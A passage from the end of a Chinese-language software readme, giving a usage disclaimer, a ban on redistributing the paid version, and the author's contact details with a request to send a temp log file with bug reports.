本人出售的软件不能保证在所有的环境都能正常使用,如果遇到不能使用的情况请更换其它软件。
八、特别声明:
本软件为免费软件,请勿将其用于非法用途。由本软件引起的任何后果均由使用者本人承担,软件作者概不
承担任何责任。
收费版本未经允许,请不要提供下载及用于其它商务活动中。
九、和我联系
如果你发现的bug,请和我联系,最好说明使用的环境,同时把winnt/temp/system.tmp发给我。
个人主页:http://www.yythac.com
Email:webmaster@yythac.com
yyt_hac@163.com
QQ:47090005